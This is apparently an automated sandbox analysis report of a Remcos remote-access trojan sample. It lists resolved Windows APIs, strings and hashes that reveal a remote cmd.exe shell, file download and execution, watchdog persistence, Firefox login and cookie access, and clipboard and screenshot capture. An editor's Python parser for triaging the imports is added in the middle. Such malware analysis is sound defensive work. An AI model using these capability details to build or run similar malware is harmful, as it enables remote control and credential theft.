                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\keHuNxIumw.exe,00000104), ref: 0040EA29
                                      • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                    • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Users\user\AppData\Roaming\keHuNxIumw.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                    • API String ID: 2830904901-3389407072
                                    • Opcode ID: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                    • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                    • Opcode Fuzzy Hash: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                    • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                    Control-flow Graph

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                    • SetEvent.KERNEL32(?), ref: 00404E43
                                    • CloseHandle.KERNELBASE(?), ref: 00404E4C
                                    • closesocket.WS2_32(?), ref: 00404E5A
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                    • SetEvent.KERNEL32(?), ref: 00404EA2
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                    • SetEvent.KERNEL32(?), ref: 00404EBA
                                    • CloseHandle.KERNEL32(?), ref: 00404EBF
                                    • CloseHandle.KERNEL32(?), ref: 00404EC4
                                    • SetEvent.KERNEL32(?), ref: 00404ED1
                                    • CloseHandle.KERNEL32(?), ref: 00404ED6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                    • String ID: PkGNG
                                    • API String ID: 3658366068-263838557
                                    • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                    • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                    • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                    • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                    Control-flow Graph

                                    • Control-flow graph for sub_4485E6 (interactive in the original report): LoadLibraryExW at 448607-448622; on failure GetLastError (448624-44862d) and a second LoadLibraryExW (44862f-44863a); FreeLibrary at 448653-448654.
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                    • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                    • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                    • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                    • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC

                                    Control-flow Graph

                                    • Control-flow graph for sub_40D0A4 (interactive in the original report): a single block 40d0a4-40d0d0 calling 401fab, CreateMutexA and GetLastError.
                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                    • GetLastError.KERNEL32 ref: 0040D0BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateErrorLastMutex
                                    • String ID: SG
                                    • API String ID: 1925916568-3189917014
                                    • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                    • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                    • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                    • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
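Editor's note (an added example; this is not code from the Joe Sandbox report, from Joe Security, or from the sample). The LoadLibraryA/GetModuleHandleA + GetProcAddress sequence listed for sub_41CBE1 above resolves the sample's sensitive imports at run time, so none of them appears in the static import table, and the CreateMutexA followed by GetLastError in sub_40D0A4 is the usual single-instance guard. The Python below parses report lines in the "APIs" format printed here, pairs each library/function pair with the GetProcAddress that follows it (the report shows the handle argument as 00000000, so the function name has to be taken from the preceding load call), and tags the result with a capability mapping that is the editor's own assumption, not something the report states. The sample lines are copied from this report; rendering the Shlwapi argument 0000000C as ordinal "#12" is an interpretation.

```python
"""Turn Joe Sandbox 'APIs' lines into the imports a sample resolves at run time
and the behaviours they suggest.  Added example, not part of the report."""
import re
from collections import OrderedDict

# One report line, e.g.
#   • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
#   • GetLastError.KERNEL32 ref: 0040D0BE            (no argument list at all)
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Editor's mapping from resolved API to the behaviour it usually serves (assumption).
CAPABILITIES = {
    "NtUnmapViewOfSection": "PE injection / process hollowing",
    "NtSuspendProcess": "suspend a process (injection or tamper)",
    "NtResumeProcess": "resume a process (injection or tamper)",
    "NtQueryInformationProcess": "query PEB / parent of a process",
    "IsUserAnAdmin": "privilege check before UAC-related logic",
    "IsWow64Process": "bitness check of a target process",
    "GetProcessImageFileNameW": "enumerate running process images",
    "GetExtendedTcpTable": "enumerate TCP connections",
    "GetExtendedUdpTable": "enumerate UDP endpoints",
    "RmStartSession": "Restart Manager: find processes holding a file open",
    "SetProcessDEPPolicy": "change own DEP policy",
    "GetConsoleWindow": "locate (and usually hide) own console window",
}

# Constructed sample: a subset of lines copied verbatim from the report above.
SAMPLE = """\
• LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
• GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
• GetProcAddress.KERNEL32(00000000), ref: 0041CC57
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
• GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
• GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
• GetProcAddress.KERNEL32(00000000), ref: 0041CD17
• LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
• GetProcAddress.KERNEL32(00000000), ref: 0041CD60
• LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
• GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
• CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
• GetLastError.KERNEL32 ref: 0040D0BE
"""
SAMPLE_LINES = SAMPLE.splitlines()


def parse_api_lines(lines):
    """Yield (api, module, args, ref) for every line in the report's 'APIs' format."""
    for line in lines:
        m = API_LINE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            yield m.group("api"), m.group("module"), args, m.group("ref")


def resolved_imports(lines):
    """Map (library, function) -> address of the load call, taken from each
    LoadLibraryA/GetModuleHandleA that is immediately followed by GetProcAddress."""
    imports = OrderedDict()
    pending = None
    for api, _module, args, ref in parse_api_lines(lines):
        if api in ("LoadLibraryA", "GetModuleHandleA") and len(args) >= 2:
            pending = (args[0], args[1], ref)
        elif api == "GetProcAddress" and pending is not None:
            lib, func, load_ref = pending
            if re.fullmatch(r"[0-9A-Fa-f]{8}", func):  # numeric 2nd arg: import by ordinal
                func = "#%d" % int(func, 16)
            imports[(lib.lower(), func)] = load_ref
            pending = None
        else:
            pending = None
    return imports


def capabilities(lines):
    """Return {api: behaviour} for the resolved imports, plus the single-instance
    mutex guard when CreateMutexA is directly followed by GetLastError."""
    lines = list(lines)
    found = OrderedDict()
    for (_lib, func) in resolved_imports(lines):
        if func in CAPABILITIES:
            found[func] = CAPABILITIES[func]
    sequence = [api for api, _m, _a, _r in parse_api_lines(lines)]
    for prev, nxt in zip(sequence, sequence[1:]):
        if prev == "CreateMutexA" and nxt == "GetLastError":
            found["CreateMutexA"] = "single-instance guard (GetLastError vs ERROR_ALREADY_EXISTS)"
            break
    return found


if __name__ == "__main__":
    for (lib, func), ref in resolved_imports(SAMPLE_LINES).items():
        print("%s!%s resolved by the load at %s" % (lib, func, ref))
    for api, what in capabilities(SAMPLE_LINES).items():
        print("%-28s %s" % (api, what))
```

Run against the full "APIs" block of sub_41CBE1 rather than the sample, the resolved list is the sample's real import table for triage purposes; the static imports of the dumped PE will not show these names. The pairing relies on the report printing the GetProcAddress line directly after its load call, which holds for the listing above.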

                                    Control-flow Graph

                                    • Control-flow graph for sub_44854A (interactive in the original report): blocks 44854a-4485e5; call 4485e6 at 448586-448588; GetProcAddress at 4485a6-4485b4; call 434591 at 4485b6-4485bf.
                                    APIs
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc__crt_fast_encode_pointer
                                    • String ID:
                                    • API String ID: 2279764990-0
                                    • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                    • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                    • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                    • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9

                                    Control-flow Graph

                                    • Control-flow graph for sub_40165E (interactive in the original report): blocks 40165e-4016b3 with calls to 43455e (new) at 401696 and 4016a8; no Windows API calls.
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                    • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                    • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                    • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D

                                    Control-flow Graph

                                    • Control-flow graph for sub_4461B8 (interactive in the original report): blocks 4461b8-446205; RtlAllocateHeap at 4461e1-4461f2, with calls to 4455c6 and 443001 on the retry path and to 44062d on failure.
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                    • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                    • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                    • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                    • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                      • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                      • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                      • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                      • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                      • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                    • DeleteFileA.KERNEL32(?), ref: 0040868D
                                      • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                      • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                      • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                      • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                    • Sleep.KERNEL32(000007D0), ref: 00408733
                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                      • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                    Strings
                                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                    • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                    • API String ID: 1067849700-181434739
                                    • Opcode ID: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                    • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                    • Opcode Fuzzy Hash: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                    • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004056E6
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __Init_thread_footer.LIBCMT ref: 00405723
                                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                      • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                    • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                    • CloseHandle.KERNEL32 ref: 00405A23
                                    • CloseHandle.KERNEL32 ref: 00405A2B
                                    • CloseHandle.KERNEL32 ref: 00405A3D
                                    • CloseHandle.KERNEL32 ref: 00405A45
                                    Strings
                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                    • API String ID: 2994406822-18413064
                                    • Opcode ID: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                    • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                    • Opcode Fuzzy Hash: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                    • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 00412141
                                      • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                      • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                      • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                    • CloseHandle.KERNEL32(00000000), ref: 00412190
                                    • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                    Strings
                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                    • API String ID: 3018269243-13974260
                                    • Opcode ID: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                    • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                    • Opcode Fuzzy Hash: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                    • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                    • FindClose.KERNEL32(00000000), ref: 0040BC04
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                    • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                    Strings
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                    • API String ID: 1164774033-3681987949
                                    • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                    • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                    • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                    • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                    APIs
                                    • OpenClipboard.USER32 ref: 004168FD
                                    • EmptyClipboard.USER32 ref: 0041690B
                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                    • GlobalLock.KERNEL32(00000000), ref: 00416934
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                    • CloseClipboard.USER32 ref: 00416990
                                    • OpenClipboard.USER32 ref: 00416997
                                    • GetClipboardData.USER32(0000000D), ref: 004169A7
                                    • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                    • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                    • CloseClipboard.USER32 ref: 004169BF
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                    • String ID: !D@
                                    • API String ID: 3520204547-604454484
                                    • Opcode ID: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                    • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                    • Opcode Fuzzy Hash: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                    • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                    • FindClose.KERNEL32(00000000), ref: 0040BE04
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                    • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                    • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                    Strings
                                    • API ID: Find$Close$File$FirstNext
                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 3527384056-432212279
                                    • Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                    • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                    • Opcode Fuzzy Hash: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                    • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0041A04A
                                    • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                    • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                    • GetLocalTime.KERNEL32(?), ref: 0041A196
                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                    Strings
                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                    • API String ID: 489098229-1431523004
                                    • Opcode ID: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                    • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                    • Opcode Fuzzy Hash: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                    • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
